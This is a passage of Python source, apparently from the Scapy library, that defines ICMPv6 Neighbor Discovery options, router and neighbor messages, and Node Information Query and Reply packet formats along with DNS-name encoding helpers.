1873 MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)),
1874 TruncPktLenField("pkt", b"", IPv6,
1875 length_from=lambda pkt: 8 * pkt.len - 8)]
1876
1877# See which value should be used for default MTU instead of 1280
1878
1879
1880class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
1881 name = "ICMPv6 Neighbor Discovery Option - MTU"
1882 fields_desc = [ByteField("type", 5),
1883 ByteField("len", 1),
1884 XShortField("res", 0),
1885 IntField("mtu", 1280)]
1886
1887 def mysummary(self):
1888 return self.sprintf("%name% %mtu%")
1889
1890
1891class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
1892 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
1893 fields_desc = [ByteField("type", 6),
1894 ByteField("len", 1),
1895 ByteField("shortcutlim", 40), # XXX
1896 ByteField("res1", 0),
1897 IntField("res2", 0)]
1898
1899
1900class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
1901 name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
1902 fields_desc = [ByteField("type", 7),
1903 ByteField("len", 1),
1904 ShortField("res", 0),
1905 IntField("advint", 0)]
1906
1907 def mysummary(self):
1908 return self.sprintf("%name% %advint% milliseconds")
1909
1910
1911class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
1912 name = "ICMPv6 Neighbor Discovery - Home Agent Information"
1913 fields_desc = [ByteField("type", 8),
1914 ByteField("len", 1),
1915 ShortField("res", 0),
1916 ShortField("pref", 0),
1917 ShortField("lifetime", 1)]
1918
1919 def mysummary(self):
1920 return self.sprintf("%name% %pref% %lifetime% seconds")
1921
1922# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
1923
1924# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
1925
1926
1927class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068
1928 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
1929 fields_desc = [ByteField("type", 17),
1930 ByteField("len", 3),
1931 ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
1932 2: "New Care-Of Address",
1933 3: "NAR's IP address"}),
1934 ByteField("plen", 64),
1935 IntField("res", 0),
1936 IP6Field("addr", "::")]
1937
1938
1939class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
1940 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" # noqa: E501
1941 fields_desc = [ByteField("type", 18),
1942 ByteField("len", 3),
1943 ByteField("optcode", 0),
1944 ByteField("plen", 64),
1945 IntField("res", 0),
1946 IP6Field("prefix", "::")]
1947
1948
1949_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1950 1: "LLA for the new AP",
1951 2: "LLA of the MN",
1952 3: "LLA of the NAR",
1953 4: "LLA of the src of TrSolPr or PrRtAdv msg",
1954 5: "AP identified by LLA belongs to current iface of router", # noqa: E501
1955 6: "No preifx info available for AP identified by the LLA", # noqa: E501
1956 7: "No fast handovers support for AP identified by the LLA"} # noqa: E501
1957
1958
1959class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068
1960 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" # noqa: E501
1961 fields_desc = [ByteField("type", 19),
1962 ByteField("len", 1),
1963 ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
1964 MACField("lla", ETHER_ANY)] # We only support ethernet
1965
1966
1967class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140
1968 name = "ICMPv6 Neighbor Discovery - MAP Option"
1969 fields_desc = [ByteField("type", 23),
1970 ByteField("len", 3),
1971 BitField("dist", 1, 4),
1972 BitField("pref", 15, 4), # highest availability
1973 BitField("R", 1, 1),
1974 BitField("res", 0, 7),
1975 IntField("validlifetime", 0xffffffff),
1976 IP6Field("addr", "::")]
1977
1978
1979class _IP6PrefixField(IP6Field):
1980 __slots__ = ["length_from"]
1981
1982 def __init__(self, name, default):
1983 IP6Field.__init__(self, name, default)
1984 self.length_from = lambda pkt: 8 * (pkt.len - 1)
1985
1986 def addfield(self, pkt, s, val):
1987 return s + self.i2m(pkt, val)
1988
1989 def getfield(self, pkt, s):
1990 tmp_len = self.length_from(pkt)
1991 p = s[:tmp_len]
1992 if tmp_len < 16:
1993 p += b'\x00' * (16 - tmp_len)
1994 return s[tmp_len:], self.m2i(pkt, p)
1995
1996 def i2len(self, pkt, x):
1997 return len(self.i2m(pkt, x))
1998
1999 def i2m(self, pkt, x):
2000 tmp_len = pkt.len
2001
2002 if x is None:
2003 x = "::"
2004 if tmp_len is None:
2005 tmp_len = 1
2006 x = inet_pton(socket.AF_INET6, x)
2007
2008 if tmp_len is None:
2009 return x
2010 if tmp_len in [0, 1]:
2011 return b""
2012 if tmp_len in [2, 3]:
2013 return x[:8 * (tmp_len - 1)]
2014
2015 return x + b'\x00' * 8 * (tmp_len - 3)
2016
2017
2018class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
2019 name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
2020 fields_desc = [ByteField("type", 24),
2021 FieldLenField("len", None, length_of="prefix", fmt="B",
2022 adjust=lambda pkt, x: x // 8 + 1),
2023 ByteField("plen", None),
2024 BitField("res1", 0, 3),
2025 BitEnumField("prf", 0, 2, icmp6ndraprefs),
2026 BitField("res2", 0, 3),
2027 IntField("rtlifetime", 0xffffffff),
2028 _IP6PrefixField("prefix", None)]
2029
2030 def mysummary(self):
2031 return self.sprintf("%name% %prefix%/%plen% Preference %prf%")
2032
2033
2034class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
2035 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
2036 fields_desc = [ByteField("type", 25),
2037 FieldLenField("len", None, count_of="dns", fmt="B",
2038 adjust=lambda pkt, x: 2 * x + 1),
2039 ShortField("res", None),
2040 IntField("lifetime", 0xffffffff),
2041 IP6ListField("dns", [],
2042 length_from=lambda pkt: 8 * (pkt.len - 1))]
2043
2044 def mysummary(self):
2045 return self.sprintf("%name% ") + ", ".join(self.dns)
2046
2047
2048class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
2049 name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
2050 fields_desc = [ByteField("type", 26),
2051 ByteField("len", 1),
2052 BitField("res", 0, 48)]
2053
2054# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
2055# described in section 3.1 of RFC 1035
2056# XXX Label should be at most 63 octets in length : we do not enforce it
2057# Total length of domain should be 255 : we do not enforce it either
2058
2059
2060class DomainNameListField(StrLenField):
2061 __slots__ = ["padded"]
2062 islist = 1
2063 padded_unit = 8
2064
2065 def __init__(self, name, default, length_from=None, padded=False): # noqa: E501
2066 self.padded = padded
2067 StrLenField.__init__(self, name, default, length_from=length_from)
2068
2069 def i2len(self, pkt, x):
2070 return len(self.i2m(pkt, x))
2071
2072 def i2h(self, pkt, x):
2073 if not x:
2074 return []
2075 return x
2076
2077 def m2i(self, pkt, x):
2078 x = plain_str(x) # Decode bytes to string
2079 res = []
2080 while x:
2081 # Get a name until \x00 is reached
2082 cur = []
2083 while x and ord(x[0]) != 0:
2084 tmp_len = ord(x[0])
2085 cur.append(x[1:tmp_len + 1])
2086 x = x[tmp_len + 1:]
2087 if self.padded:
2088 # Discard following \x00 in padded mode
2089 if len(cur):
2090 res.append(".".join(cur) + ".")
2091 else:
2092 # Store the current name
2093 res.append(".".join(cur) + ".")
2094 if x and ord(x[0]) == 0:
2095 x = x[1:]
2096 return res
2097
2098 def i2m(self, pkt, x):
2099 def conditionalTrailingDot(z):
2100 if z and orb(z[-1]) == 0:
2101 return z
2102 return z + b'\x00'
2103 # Build the encode names
2104 tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes # noqa: E501
2105 ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp)
2106
2107 # In padded mode, add some \x00 bytes
2108 if self.padded and not len(ret_string) % self.padded_unit == 0:
2109 ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) # noqa: E501
2110
2111 return ret_string
2112
2113
2114class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106
2115 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
2116 fields_desc = [ByteField("type", 31),
2117 FieldLenField("len", None, length_of="searchlist", fmt="B",
2118 adjust=lambda pkt, x: 1 + x // 8),
2119 ShortField("res", None),
2120 IntField("lifetime", 0xffffffff),
2121 DomainNameListField("searchlist", [],
2122 length_from=lambda pkt: 8 * pkt.len - 8,
2123 padded=True)
2124 ]
2125
2126 def mysummary(self):
2127 return self.sprintf("%name% ") + ", ".join(self.searchlist)
2128
2129
2130class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet): # RFC 8910
2131 name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option"
2132 fields_desc = [ByteField("type", 37),
2133 FieldLenField("len", None, length_of="URI", fmt="B",
2134 adjust=lambda pkt, x: (2 + x) // 8),
2135 ICMPv6NDOptDataField("URI", "", strip_zeros=True,
2136 length_from=lambda pkt:
2137 8 * max(pkt.len, 1) - 2)]
2138
2139 def mysummary(self):
2140 return self.sprintf("%name% %URI%")
2141
2142
2143class _PREF64(IP6Field):
2144 def addfield(self, pkt, s, val):
2145 return s + self.i2m(pkt, val)[:12]
2146
2147 def getfield(self, pkt, s):
2148 return s[12:], self.m2i(pkt, s[:12] + b"\x00" * 4)
2149
2150
2151class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet): # RFC 8781
2152 name = "ICMPv6 Neighbor Discovery Option - PREF64 Option"
2153 fields_desc = [ByteField("type", 38),
2154 ByteField("len", 2),
2155 BitField("scaledlifetime", 0, 13),
2156 BitEnumField("plc", 0, 3,
2157 ["/96", "/64", "/56", "/48", "/40", "/32"]),
2158 _PREF64("prefix", "::")]
2159
2160 def mysummary(self):
2161 plc = self.sprintf("%plc%") if self.plc < 6 else f"[invalid PLC({self.plc})]"
2162 return self.sprintf("%name% %prefix%") + plc
2163
2164# End of ICMPv6 Neighbor Discovery Options.
2165
2166
2167class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
2168 name = "ICMPv6 Neighbor Discovery - Router Solicitation"
2169 fields_desc = [ByteEnumField("type", 133, icmp6types),
2170 ByteField("code", 0),
2171 XShortField("cksum", None),
2172 IntField("res", 0)]
2173 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}
2174
2175
2176class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
2177 name = "ICMPv6 Neighbor Discovery - Router Advertisement"
2178 fields_desc = [ByteEnumField("type", 134, icmp6types),
2179 ByteField("code", 0),
2180 XShortField("cksum", None),
2181 ByteField("chlim", 0),
2182 BitField("M", 0, 1),
2183 BitField("O", 0, 1),
2184 BitField("H", 0, 1),
2185 BitEnumField("prf", 1, 2, icmp6ndraprefs), # RFC 4191
2186 BitField("P", 0, 1),
2187 BitField("res", 0, 2),
2188 ShortField("routerlifetime", 1800),
2189 IntField("reachabletime", 0),
2190 IntField("retranstimer", 0)]
2191 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2192
2193 def answers(self, other):
2194 return isinstance(other, ICMPv6ND_RS)
2195
2196 def mysummary(self):
2197 return self.sprintf("%name% Lifetime %routerlifetime% "
2198 "Hop Limit %chlim% Preference %prf% "
2199 "Managed %M% Other %O% Home %H%")
2200
2201
2202class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2203 name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
2204 fields_desc = [ByteEnumField("type", 135, icmp6types),
2205 ByteField("code", 0),
2206 XShortField("cksum", None),
2207 IntField("res", 0),
2208 IP6Field("tgt", "::")]
2209 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2210
2211 def mysummary(self):
2212 return self.sprintf("%name% (tgt: %tgt%)")
2213
2214 def hashret(self):
2215 return bytes_encode(self.tgt) + self.payload.hashret()
2216
2217
2218class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2219 name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
2220 fields_desc = [ByteEnumField("type", 136, icmp6types),
2221 ByteField("code", 0),
2222 XShortField("cksum", None),
2223 BitField("R", 1, 1),
2224 BitField("S", 0, 1),
2225 BitField("O", 1, 1),
2226 XBitField("res", 0, 29),
2227 IP6Field("tgt", "::")]
2228 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2229
2230 def mysummary(self):
2231 return self.sprintf("%name% (tgt: %tgt%)")
2232
2233 def hashret(self):
2234 return bytes_encode(self.tgt) + self.payload.hashret()
2235
2236 def answers(self, other):
2237 return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
2238
2239# associated possible options : target link-layer option, Redirected header
2240
2241
2242class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2243 name = "ICMPv6 Neighbor Discovery - Redirect"
2244 fields_desc = [ByteEnumField("type", 137, icmp6types),
2245 ByteField("code", 0),
2246 XShortField("cksum", None),
2247 XIntField("res", 0),
2248 IP6Field("tgt", "::"),
2249 IP6Field("dst", "::")]
2250 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2251
2252
2253# ICMPv6 Inverse Neighbor Discovery (RFC 3122) #
2254
2255class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
2256 name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
2257 fields_desc = [ByteField("type", 9),
2258 FieldLenField("len", None, count_of="addrlist", fmt="B",
2259 adjust=lambda pkt, x: 2 * x + 1),
2260 StrFixedLenField("res", b"\x00" * 6, 6),
2261 IP6ListField("addrlist", [],
2262 length_from=lambda pkt: 8 * (pkt.len - 1))]
2263
2264
2265class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
2266 name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
2267 type = 10
2268
2269
2270# RFC3122
2271# Options requises : source lladdr et target lladdr
2272# Autres options valides : source address list, MTU
2273# - Comme precise dans le document, il serait bien de prendre l'adresse L2
2274# demandee dans l'option requise target lladdr et l'utiliser au niveau
2275# de l'adresse destination ethernet si aucune adresse n'est precisee
2276# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes
2277# les options.
2278# Ether() must use the target lladdr as destination
2279class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
2280 name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
2281 fields_desc = [ByteEnumField("type", 141, icmp6types),
2282 ByteField("code", 0),
2283 XShortField("cksum", None),
2284 XIntField("reserved", 0)]
2285 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2286
2287# Options requises : target lladdr, target address list
2288# Autres options valides : MTU
2289
2290
2291class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
2292 name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
2293 fields_desc = [ByteEnumField("type", 142, icmp6types),
2294 ByteField("code", 0),
2295 XShortField("cksum", None),
2296 XIntField("reserved", 0)]
2297 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2298
2299
2300###############################################################################
2301# ICMPv6 Node Information Queries (RFC 4620)
2302###############################################################################
2303
2304# [ ] Add automatic destination address computation using computeNIGroupAddr
2305# in IPv6 class (Scapy6 modification when integrated) if :
2306# - it is not provided
2307# - upper layer is ICMPv6NIQueryName() with a valid value
2308# [ ] Try to be liberal in what we accept as internal values for _explicit_
2309# DNS elements provided by users. Any string should be considered
2310# valid and kept like it has been provided. At the moment, i2repr() will
2311# crash on many inputs
2312# [ ] Do the documentation
2313# [ ] Add regression tests
2314# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501
2315# [ ] Check if there are differences between different stacks. Among *BSD,
2316# with others.
2317# [ ] Deal with flags in a consistent way.
2318# [ ] Implement compression in names2dnsrepr() and decompresiion in
2319# dnsrepr2names(). Should be deactivable.
2320
2321icmp6_niqtypes = {0: "NOOP",
2322 2: "Node Name",
2323 3: "IPv6 Address",
2324 4: "IPv4 Address"}
2325
2326
2327class _ICMPv6NIHashret:
2328 def hashret(self):
2329 return bytes_encode(self.nonce)
2330
2331
2332class _ICMPv6NIAnswers:
2333 def answers(self, other):
2334 return self.nonce == other.nonce
2335
2336# Buggy; always returns the same value during a session
2337
2338
2339class NonceField(StrFixedLenField):
2340 def __init__(self, name, default=None):
2341 StrFixedLenField.__init__(self, name, default, 8)
2342 if default is None:
2343 self.default = self.randval()
2344
2345
2346@conf.commands.register
2347def computeNIGroupAddr(name):
2348 """Compute the NI group Address. Can take a FQDN as input parameter"""
2349 name = name.lower().split(".")[0]
2350 record = chr(len(name)) + name
2351 h = md5(record.encode("utf8"))
2352 h = h.digest()
2353 addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
2354 return addr
2355
2356
2357# Here is the deal. First, that protocol is a piece of shit. Then, we
2358# provide 4 classes for the different kinds of Requests (one for every
2359# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
2360# data field class that is made to be smart by guessing the specific
2361# type of value provided :
2362#
2363# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
2364# if not overridden by user
2365# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
2366# if not overridden
2367# - Name in the other cases: code is set to 0, if not overridden by user
2368#
2369# Internal storage, is not only the value, but the a pair providing
2370# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@)
2371#
2372# Note : I merged getfield() and m2i(). m2i() should not be called
2373# directly anyway. Same remark for addfield() and i2m()
2374#
2375# -- arno
2376
2377# "The type of information present in the Data field of a query is
2378# declared by the ICMP Code, whereas the type of information in a
2379# Reply is determined by the Qtype"
2380
2381def names2dnsrepr(x):
2382 """
2383 Take as input a list of DNS names or a single DNS name
2384 and encode it in DNS format (with possible compression)
2385 If a string that is already a DNS name in DNS format
2386 is passed, it is returned unmodified. Result is a string.
2387 !!! At the moment, compression is not implemented !!!
2388 """
2389
2390 if isinstance(x, bytes):
2391 if x and x[-1:] == b'\x00': # stupid heuristic
2392 return x
2393 x = [x]
2394
2395 res = []
2396 for n in x:
2397 termin = b"\x00"
2398 if n.count(b'.') == 0: # single-component gets one more
2399 termin += b'\x00'
2400 n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin
2401 res.append(n)
2402 return b"".join(res)
2403
2404
2405def dnsrepr2names(x):
2406 """
2407 Take as input a DNS encoded string (possibly compressed)
2408 and returns a list of DNS names contained in it.
2409 If provided string is already in printable format
2410 (does not end with a null character, a one element list
2411 is returned). Result is a list.
2412 """
2413 res = []
2414 cur = b""
2415 while x:
2416 tmp_len = orb(x[0])
2417 x = x[1:]
2418 if not tmp_len:
2419 if cur and cur[-1:] == b'.':
2420 cur = cur[:-1]
2421 res.append(cur)
2422 cur = b""
2423 if x and orb(x[0]) == 0: # single component
2424 x = x[1:]
2425 continue
2426 if tmp_len & 0xc0: # XXX TODO : work on that -- arno
2427 raise Exception("DNS message can't be compressed at this point!")
2428 cur += x[:tmp_len] + b"."
2429 x = x[tmp_len:]
2430 return res
2431
2432
2433class NIQueryDataField(StrField):
2434 def __init__(self, name, default):
2435 StrField.__init__(self, name, default)
2436
2437 def i2h(self, pkt, x):
2438 if x is None:
2439 return x
2440 t, val = x
2441 if t == 1:
2442 val = dnsrepr2names(val)[0]
2443 return val
2444
2445 def h2i(self, pkt, x):
2446 if x is tuple and isinstance(x[0], int):
2447 return x
2448
2449 # Try IPv6
2450 try:
2451 inet_pton(socket.AF_INET6, x.decode())
2452 return (0, x.decode())
2453 except Exception:
2454 pass
2455 # Try IPv4
2456 try:
2457 inet_pton(socket.AF_INET, x.decode())
2458 return (2, x.decode())
2459 except Exception:
2460 pass
2461 # Try DNS
2462 if x is None:
2463 x = b""
2464 x = names2dnsrepr(x)
2465 return (1, x)
2466
2467 def i2repr(self, pkt, x):
2468 t, val = x
2469 if t == 1: # DNS Name
2470 # we don't use dnsrepr2names() to deal with
2471 # possible weird data extracted info
2472 res = []
2473 while val:
2474 tmp_len = orb(val[0])
2475 val = val[1:]
2476 if tmp_len == 0:
2477 break
2478 res.append(plain_str(val[:tmp_len]) + ".")
2479 val = val[tmp_len:]
2480 tmp = "".join(res)
2481 if tmp and tmp[-1] == '.':
2482 tmp = tmp[:-1]
2483 return tmp
2484 return repr(val)
2485
2486 def getfield(self, pkt, s):
2487 qtype = getattr(pkt, "qtype")
2488 if qtype == 0: # NOOP
2489 return s, (0, b"")
2490 else:
2491 code = getattr(pkt, "code")
2492 if code == 0: # IPv6 Addr
2493 return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
2494 elif code == 2: # IPv4 Addr
2495 return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
2496 else: # Name or Unknown
2497 return b"", (1, s)
2498
2499 def addfield(self, pkt, s, val):
2500 if ((isinstance(val, tuple) and val[1] is None) or
2501 val is None):
2502 val = (1, b"")
2503 t = val[0]
2504 if t == 1:
2505 return s + val[1]
2506 elif t == 0:
2507 return s + inet_pton(socket.AF_INET6, val[1])
2508 else:
2509 return s + inet_pton(socket.AF_INET, val[1])
2510
2511
2512class NIQueryCodeField(ByteEnumField):
2513 def i2m(self, pkt, x):
2514 if x is None:
2515 d = pkt.getfieldval("data")
2516 if d is None:
2517 return 1
2518 elif d[0] == 0: # IPv6 address
2519 return 0
2520 elif d[0] == 1: # Name
2521 return 1
2522 elif d[0] == 2: # IPv4 address
2523 return 2
2524 else:
2525 return 1
2526 return x
2527
2528
2529_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
2530
2531# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
2532# 8: "Link-local addresses", 16: "Site-local addresses",
2533# 32: "Global addresses" }
2534
2535# "This NI type has no defined flags and never has a Data Field". Used
2536# to know if the destination is up and implements NI protocol.
2537
2538
2539class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
2540 name = "ICMPv6 Node Information Query - NOOP Query"
2541 fields_desc = [ByteEnumField("type", 139, icmp6types),
2542 NIQueryCodeField("code", None, _niquery_code),
2543 XShortField("cksum", None),
2544 ShortEnumField("qtype", 0, icmp6_niqtypes),
2545 BitField("unused", 0, 10),
2546 FlagsField("flags", 0, 6, "TACLSG"),
2547 NonceField("nonce", None),
2548 NIQueryDataField("data", None)]
2549
2550
2551class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
2552 name = "ICMPv6 Node Information Query - IPv6 Name Query"
2553 qtype = 2
2554
2555# We ask for the IPv6 address of the peer
2556
2557
2558class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
2559 name = "ICMPv6 Node Information Query - IPv6 Address Query"
2560 qtype = 3
2561 flags = 0x3E
2562
2563
2564class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
2565 name = "ICMPv6 Node Information Query - IPv4 Address Query"
2566 qtype = 4
2567
2568
2569_nireply_code = {0: "Successful Reply",
2570 1: "Response Refusal",
2571 3: "Unknown query type"}
2572
2573_nireply_flags = {1: "Reply set incomplete",
2574 2: "All unicast addresses",
2575 4: "IPv4 addresses",
2576 8: "Link-local addresses",
2577 16: "Site-local addresses",
2578 32: "Global addresses"}
2579
2580# Internal repr is one of those :
2581# (0, "some string") : unknown qtype value are mapped to that one
2582# (3, [ (ttl, ip6), ... ])
2583# (4, [ (ttl, ip4), ... ])
2584# (2, [ttl, dns_names]) : dns_names is one string that contains
2585# all the DNS names. Internally it is kept ready to be sent
2586# (undissected). i2repr() decode it for user. This is to
2587# make build after dissection bijective.
2588#
2589# I also merged getfield() and m2i(), and addfield() and i2m().
2590
2591
2592class NIReplyDataField(StrField):
2593
2594 def i2h(self, pkt, x):
2595 if x is None:
2596 return x
2597 t, val = x
2598 if t == 2:
2599 ttl, dnsnames = val
2600 val = [ttl] + dnsrepr2names(dnsnames)
2601 return val
2602
2603 def h2i(self, pkt, x):
2604 qtype = 0 # We will decode it as string if not
2605 # overridden through 'qtype' in pkt
2606
2607 # No user hint, let's use 'qtype' value for that purpose
2608 if not isinstance(x, tuple):
2609 if pkt is not None:
2610 qtype = pkt.qtype
2611 else:
2612 qtype = x[0]
2613 x = x[1]
2614
2615 # From that point on, x is the value (second element of the tuple)
2616
2617 if qtype == 2: # DNS name
2618 if isinstance(x, (str, bytes)): # listify the string
2619 x = [x]
2620 if isinstance(x, list):
2621 x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501
2622 if x and isinstance(x[0], int):
2623 ttl = x[0]
2624 names = x[1:]
2625 else:
2626 ttl = 0
2627 names = x
2628 return (2, [ttl, names2dnsrepr(names)])
2629
2630 elif qtype in [3, 4]: # IPv4 or IPv6 addr
2631 if not isinstance(x, list):
2632 x = [x] # User directly provided an IP, instead of list
2633
2634 def fixvalue(x):
2635 # List elements are not tuples, user probably
2636 # omitted ttl value : we will use 0 instead
2637 if not isinstance(x, tuple):
2638 x = (0, x)
2639 # Decode bytes
2640 if isinstance(x[1], bytes):
2641 x = (x[0], x[1].decode())
2642 return x
2643
2644 return (qtype, [fixvalue(d) for d in x])
2645
2646 return (qtype, x)
2647
2648 def addfield(self, pkt, s, val):
2649 t, tmp = val
2650 if tmp is None:
2651 tmp = b""
2652 if t == 2:
2653 ttl, dnsstr = tmp
2654 return s + struct.pack("!I", ttl) + dnsstr
2655 elif t == 3:
2656 return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501
2657 elif t == 4:
2658 return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501
2659 else:
2660 return s + tmp
2661
2662 def getfield(self, pkt, s):
2663 code = getattr(pkt, "code")
2664 if code != 0:
2665 return s, (0, b"")
2666
2667 qtype = getattr(pkt, "qtype")
2668 if qtype == 0: # NOOP
2669 return s, (0, b"")
2670
2671 elif qtype == 2:
2672 if len(s) < 4:
2673 return s, (0, b"")
2674 ttl = struct.unpack("!I", s[:4])[0]
2675 return b"", (2, [ttl, s[4:]])
2676
2677 elif qtype == 3: # IPv6 addresses with TTLs
2678 # XXX TODO : get the real length
2679 res = []
2680 while len(s) >= 20: # 4 + 16
2681 ttl = struct.unpack("!I", s[:4])[0]
2682 ip = inet_ntop(socket.AF_INET6, s[4:20])
2683 res.append((ttl, ip))
2684 s = s[20:]
2685 return s, (3, res)
2686
2687 elif qtype == 4: # IPv4 addresses with TTLs
2688 # XXX TODO : get the real length
2689 res = []
2690 while len(s) >= 8: # 4 + 4
2691 ttl = struct.unpack("!I", s[:4])[0]
2692 ip = inet_ntop(socket.AF_INET, s[4:8])
2693 res.append((ttl, ip))
2694 s = s[8:]
2695 return s, (4, res)
2696 else:
2697 # XXX TODO : implement me and deal with real length
2698 return b"", (0, s)
2699
2700 def i2repr(self, pkt, x):
2701 if x is None:
2702 return "[]"
2703
2704 if isinstance(x, tuple) and len(x) == 2:
2705 t, val = x
2706 if t == 2: # DNS names
2707 ttl, tmp_len = val
2708 tmp_len = dnsrepr2names(tmp_len)
2709 names_list = (plain_str(name) for name in tmp_len)
2710 return "ttl:%d %s" % (ttl, ",".join(names_list))
2711 elif t == 3 or t == 4:
2712 return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501
2713 return repr(val)
2714 return repr(x) # XXX should not happen
2715
2716# By default, sent responses have code set to 0 (successful)
2717
2718
2719class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
2720 name = "ICMPv6 Node Information Reply - NOOP Reply"
2721 fields_desc = [ByteEnumField("type", 140, icmp6types),
2722 ByteEnumField("code", 0, _nireply_code),
2723 XShortField("cksum", None),
2724 ShortEnumField("qtype", 0, icmp6_niqtypes),
2725 BitField("unused", 0, 10),
2726 FlagsField("flags", 0, 6, "TACLSG"),
2727 NonceField("nonce", None),
2728 NIReplyDataField("data", None)]
2729
2730
2731class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
2732 name = "ICMPv6 Node Information Reply - Node Names"
2733 qtype = 2
2734
2735
2736class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
2737 name = "ICMPv6 Node Information Reply - IPv6 addresses"
2738 qtype = 3
2739
2740
2741class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
2742 name = "ICMPv6 Node Information Reply - IPv4 addresses"
2743 qtype = 4
2744
2745
2746class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
2747 name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
2748 code = 1
2749
2750
2751class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
2752 name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
2753 code = 2
2754
2755
2756def _niquery_guesser(p):
2757 cls = conf.raw_layer
2758 type = orb(p[0])
2759 if type == 139: # Node Info Query specific stuff
2760 if len(p) > 6:
2761 qtype, = struct.unpack("!H", p[4:6])
